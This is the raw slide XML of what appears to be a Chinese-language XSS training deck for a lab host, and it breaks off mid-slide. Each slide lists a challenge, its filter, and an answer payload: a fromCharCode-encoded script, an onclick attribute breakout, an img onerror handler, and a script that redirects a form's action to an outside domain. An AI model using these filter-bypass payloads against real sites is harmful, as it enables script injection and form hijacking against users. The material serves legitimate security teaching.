              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;alert("Hello World!");&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13193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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 绕过简单过滤</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：注入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>弹出“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Hello</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>World</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>！“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mcir.pte.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xssmh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/challenges/challenge1.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤：单引号，双引号</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;a=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0"/>
              <a:t>(72, 101, 108, 108, 111, 32, 87, 111, 114, 108, 100, 33);</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0"/>
              <a:t>(a)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167771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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>3:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>属性注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：注入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>弹出“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Hello</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>World</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>！“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mcir.pte.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xssmh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/challenges/challenge3.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>clickhere</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('Hello World!');</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207259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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 正常注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：注入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>弹出“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Hello</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>World</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>！“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mcir.pte.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xssmh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/challenges/challenge4.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>knownsec</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=alert</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('Hello World!')&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118375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存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="64798"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="20340742">
            <a:off x="3495108" y="969382"/>
            <a:ext cx="4135325" cy="3130481"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18191512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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 查询注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：跳转到“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>gooann.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mcir.pte.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xssmh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/challenges/challenge5.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> &lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>document.getElementsByName</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xssform</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>')[0].action='http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>gooann.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>';&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39996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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>值注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>弹出“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Hello</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>World</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>！”</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mcir.pte.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xssmh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/challenges/challenge6.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤：双引号</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>script</a:t>
